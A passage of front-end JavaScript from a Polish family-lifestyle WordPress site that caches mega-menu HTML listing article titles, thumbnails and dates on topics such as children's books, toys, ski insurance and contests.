block_td_uid_54_5c5e20b7a414d.post_count = "3";
block_td_uid_54_5c5e20b7a414d.found_posts = "290";
block_td_uid_54_5c5e20b7a414d.header_color = "";
block_td_uid_54_5c5e20b7a414d.ajax_pagination_infinite_stop = "";
block_td_uid_54_5c5e20b7a414d.max_num_pages = "97";
tdBlocksArray.push(block_td_uid_54_5c5e20b7a414d);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_54_5c5e20b7a414d));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ksiazki-dla-dzieci-nie-tylko-polsku\/\" rel=\"bookmark\" title=\"Ksi\u0105\u017cki dla dzieci nie tylko polsku\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/g\u0142\u00f3wne_Big-Fish-Little-Fish-boSPREAD-1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/g\u0142\u00f3wne_Big-Fish-Little-Fish-boSPREAD-1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/g\u0142\u00f3wne_Big-Fish-Little-Fish-boSPREAD-1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/g\u0142\u00f3wne_Big-Fish-Little-Fish-boSPREAD-1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ksi\u0105\u017cki dla dzieci nie tylko polsku\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/ksiazki-i-magazyny\/\" class=\"td-post-category\">Ksi\u0105\u017cki i magazyny<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ksiazki-dla-dzieci-nie-tylko-polsku\/\" rel=\"bookmark\" title=\"Ksi\u0105\u017cki dla dzieci nie tylko polsku\">Ksi\u0105\u017cki dla dzieci nie tylko polsku<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-02-04T16:20:34+00:00\" >4 lutego 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jakie-gry-na-konsole-dla-dzieci-wybierac\/\" rel=\"bookmark\" title=\"Jakie gry na konsole dla dzieci wybiera\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/jakiegrynakonsoledladzieciwybierac2-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/jakiegrynakonsoledladzieciwybierac2-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/jakiegrynakonsoledladzieciwybierac2-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/jakiegrynakonsoledladzieciwybierac2-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jakie gry na konsole dla dzieci wybiera\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/twoja-rozrywka\/\" class=\"td-post-category\">Twoja rozrywka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jakie-gry-na-konsole-dla-dzieci-wybierac\/\" rel=\"bookmark\" title=\"Jakie gry na konsole dla dzieci wybiera\u0107?\">Jakie gry na konsole dla dzieci wybiera\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-02-03T15:44:31+00:00\" >3 lutego 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ubezpieczenie-na-narty-w-drodze-i-na-stoku\/\" rel=\"bookmark\" title=\"Ubezpieczenie na narty \u2013 w drodze i na stoku\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/ubezpieczenienanarty-wdrodzeinastoku1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/ubezpieczenienanarty-wdrodzeinastoku1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/ubezpieczenienanarty-wdrodzeinastoku1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/ubezpieczenienanarty-wdrodzeinastoku1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ubezpieczenie na narty \u2013 w drodze i na stoku\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/wakacje-i-urlop\/\" class=\"td-post-category\">Wakacje i urlop<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ubezpieczenie-na-narty-w-drodze-i-na-stoku\/\" rel=\"bookmark\" title=\"Ubezpieczenie na narty \u2013 w drodze i na stoku\">Ubezpieczenie na narty \u2013 w drodze i na stoku<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-02-03T15:37:01+00:00\" >3 lutego 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_54_5c5e20b7a414d","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_54_5c5e20b7a414d));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 56;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/gry-dydaktyczne-dla-dzieci-dobra-zabawa-o-walorach-edukacyjnych\/\" rel=\"bookmark\" title=\"Gry dydaktyczne dla dzieci &#8211; dobra zabawa o walorach edukacyjnych\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/fotolia_145108469_xs-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/fotolia_145108469_xs-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/fotolia_145108469_xs-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/fotolia_145108469_xs-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Gry dydaktyczne dla dzieci &#8211; dobra zabawa o walorach edukacyjnych\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/kacik-dziecka\/\" class=\"td-post-category\">K\u0105cik dziecka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/gry-dydaktyczne-dla-dzieci-dobra-zabawa-o-walorach-edukacyjnych\/\" rel=\"bookmark\" title=\"Gry dydaktyczne dla dzieci &#8211; dobra zabawa o walorach edukacyjnych\">Gry dydaktyczne dla dzieci &#8211; dobra zabawa o walorach edukacyjnych<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-09T13:22:41+00:00\" >9 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/dlaczego-warto-postawic-na-catering-dla-szkol\/\" rel=\"bookmark\" title=\"Dlaczego warto postawi\u0107 na catering dla szk\u00f3\u0142?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/boy-1209964_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/boy-1209964_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/boy-1209964_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/boy-1209964_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Dlaczego warto postawi\u0107 na catering dla szk\u00f3\u0142?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/kacik-dziecka\/\" class=\"td-post-category\">K\u0105cik dziecka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/dlaczego-warto-postawic-na-catering-dla-szkol\/\" rel=\"bookmark\" title=\"Dlaczego warto postawi\u0107 na catering dla szk\u00f3\u0142?\">Dlaczego warto postawi\u0107 na catering dla szk\u00f3\u0142?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-25T16:52:23+00:00\" >25 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zabawki-wspierajace-rozwoj-dziecka\/\" rel=\"bookmark\" title=\"Zabawki wspieraj\u0105ce rozw\u00f3j dziecka\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/edukacyjne-zabawki-dla-dzieci-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/edukacyjne-zabawki-dla-dzieci-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/edukacyjne-zabawki-dla-dzieci-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/edukacyjne-zabawki-dla-dzieci-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Zabawki wspieraj\u0105ce rozw\u00f3j dziecka\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/kacik-dziecka\/\" class=\"td-post-category\">K\u0105cik dziecka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zabawki-wspierajace-rozwoj-dziecka\/\" rel=\"bookmark\" title=\"Zabawki wspieraj\u0105ce rozw\u00f3j dziecka\">Zabawki wspieraj\u0105ce rozw\u00f3j dziecka<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-03-26T19:44:12+00:00\" >26 marca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_54_5c5e20b7a414d","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_54_5c5e20b7a414d));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 82;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/analiza-dlaczego-kazdy-biznes-wymaga-promocji\/\" rel=\"bookmark\" title=\"Analiza: Dlaczego ka\u017cdy biznes wymaga promocji\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/ads-beverage-black-coffee-33972-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/ads-beverage-black-coffee-33972-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/ads-beverage-black-coffee-33972-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/ads-beverage-black-coffee-33972-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Analiza: Dlaczego ka\u017cdy biznes wymaga promocji\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/komputer-i-internet\/\" class=\"td-post-category\">Komputer i Internet<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/analiza-dlaczego-kazdy-biznes-wymaga-promocji\/\" rel=\"bookmark\" title=\"Analiza: Dlaczego ka\u017cdy biznes wymaga promocji\">Analiza: Dlaczego ka\u017cdy biznes wymaga promocji<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-31T18:46:58+00:00\" >31 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-zwiekszyc-nasze-szanse-na-uzyskanie-mikropozyczki\/\" rel=\"bookmark\" title=\"Jak zwi\u0119kszy\u0107 nasze szanse na uzyskanie mikropo\u017cyczki?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/ankieta-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/ankieta-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/ankieta-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/ankieta-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak zwi\u0119kszy\u0107 nasze szanse na uzyskanie mikropo\u017cyczki?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/komputer-i-internet\/\" class=\"td-post-category\">Komputer i Internet<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-zwiekszyc-nasze-szanse-na-uzyskanie-mikropozyczki\/\" rel=\"bookmark\" title=\"Jak zwi\u0119kszy\u0107 nasze szanse na uzyskanie mikropo\u017cyczki?\">Jak zwi\u0119kszy\u0107 nasze szanse na uzyskanie mikropo\u017cyczki?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-06-04T17:03:12+00:00\" >4 czerwca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/kogo-to-numer-tel\/\" rel=\"bookmark\" title=\"Kogo to numer tel?\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/5.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/5.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/5-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/5-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/5-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/5-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kogo to numer tel?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/komputer-i-internet\/\" class=\"td-post-category\">Komputer i Internet<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/kogo-to-numer-tel\/\" rel=\"bookmark\" title=\"Kogo to numer tel?\">Kogo to numer tel?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-03-10T10:12:22+00:00\" >10 marca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_54_5c5e20b7a414d","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_54_5c5e20b7a414d));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 71;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zatrzymaj-magiczne-chwile-pieluszkami-dada-konkursie-fotobudka\/\" rel=\"bookmark\" title=\"Zatrzymaj magiczne chwile z pieluszkami Dada w konkursie Fotobudka\"><img width=\"139\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/dada_keyvisual_pion.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/dada_keyvisual_pion.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/dada_keyvisual_pion-213x300.jpg 213w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/dada_keyvisual_pion-768x1080.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/dada_keyvisual_pion-728x1024.jpg 728w\" sizes=\"(max-width: 139px) 100vw, 139px\" alt=\"\" title=\"Zatrzymaj magiczne chwile z pieluszkami Dada w konkursie Fotobudka\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/konkursy\/\" class=\"td-post-category\">Konkursy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zatrzymaj-magiczne-chwile-pieluszkami-dada-konkursie-fotobudka\/\" rel=\"bookmark\" title=\"Zatrzymaj magiczne chwile z pieluszkami Dada w konkursie Fotobudka\">Zatrzymaj magiczne chwile z pieluszkami Dada w konkursie Fotobudka<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-05-17T16:45:28+00:00\" >17 maja 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/konkurs-inhalatorow-firmy-diagnosis\/\" rel=\"bookmark\" title=\"Konkurs inhalator\u00f3w firmy Diagnosis\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/konkursy\/\" class=\"td-post-category\">Konkursy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/konkurs-inhalatorow-firmy-diagnosis\/\" rel=\"bookmark\" title=\"Konkurs inhalator\u00f3w firmy Diagnosis\">Konkurs inhalator\u00f3w firmy Diagnosis<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2015-11-19T14:40:34+00:00\" >19 listopada 2015<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/inhalator-niezastapione-urzadzenie-na-czas-zwalczania-infekcji-i-przeziebien\/\" rel=\"bookmark\" title=\"Inhalator &#8211; niezast\u0105pione urz\u0105dzenie na czas zwalczania infekcji i przezi\u0119bie\u0144\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/konkursy\/\" class=\"td-post-category\">Konkursy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/inhalator-niezastapione-urzadzenie-na-czas-zwalczania-infekcji-i-przeziebien\/\" rel=\"bookmark\" title=\"Inhalator &#8211; niezast\u0105pione urz\u0105dzenie na czas zwalczania infekcji i przezi\u0119bie\u0144\">Inhalator &#8211; niezast\u0105pione urz\u0105dzenie na czas zwalczania infekcji i przezi\u0119bie\u0144<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2014-11-27T09:46:32+00:00\" >27 listopada 2014<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_54_5c5e20b7a414d","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_54_5c5e20b7a414d));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 55;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ksiazki-dla-dzieci-nie-tylko-polsku\/\" rel=\"bookmark\" title=\"Ksi\u0105\u017cki dla dzieci nie tylko polsku\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/g\u0142\u00f3wne_Big-Fish-Little-Fish-boSPREAD-1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/g\u0142\u00f3wne_Big-Fish-Little-Fish-boSPREAD-1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/g\u0142\u00f3wne_Big-Fish-Little-Fish-boSPREAD-1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/g\u0142\u00f3wne_Big-Fish-Little-Fish-boSPREAD-1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ksi\u0105\u017cki dla dzieci nie tylko polsku\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/ksiazki-i-magazyny\/\" class=\"td-post-category\">Ksi\u0105\u017cki i magazyny<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ksiazki-dla-dzieci-nie-tylko-polsku\/\" rel=\"bookmark\" title=\"Ksi\u0105\u017cki dla dzieci nie tylko polsku\">Ksi\u0105\u017cki dla dzieci nie tylko polsku<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-02-04T16:20:34+00:00\" >4 lutego 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory\/\" rel=\"bookmark\" title=\"Bestsellery Wydawnictwa \u015awi\u0119ty Wojciech na zimowe wieczory\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory-260x195.jpeg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory-260x195.jpeg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory-80x60.jpeg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory-245x184.jpeg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Bestsellery Wydawnictwa \u015awi\u0119ty Wojciech na zimowe wieczory\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/ksiazki-i-magazyny\/\" class=\"td-post-category\">Ksi\u0105\u017cki i magazyny<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory\/\" rel=\"bookmark\" title=\"Bestsellery Wydawnictwa \u015awi\u0119ty Wojciech na zimowe wieczory\">Bestsellery Wydawnictwa \u015awi\u0119ty Wojciech na zimowe wieczory<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-10T16:18:32+00:00\" >10 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/niezwykla-lektura-dla-mlodych-milosnikow-przygod-explorer-academy-tajemnica-mglawicy\/\" rel=\"bookmark\" title=\"Niezwyk\u0142a lektura dla m\u0142odych mi\u0142o\u015bnik\u00f3w przyg\u00f3d &#8211; \u201eExplorer Academy. Tajemnica mg\u0142awicy\u201d\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/okladka-explorer-academy-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/okladka-explorer-academy-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/okladka-explorer-academy-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/okladka-explorer-academy-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Niezwyk\u0142a lektura dla m\u0142odych mi\u0142o\u015bnik\u00f3w przyg\u00f3d &#8211; \u201eExplorer Academy. Tajemnica mg\u0142awicy\u201d\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/ksiazki-i-magazyny\/\" class=\"td-post-category\">Ksi\u0105\u017cki i magazyny<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title 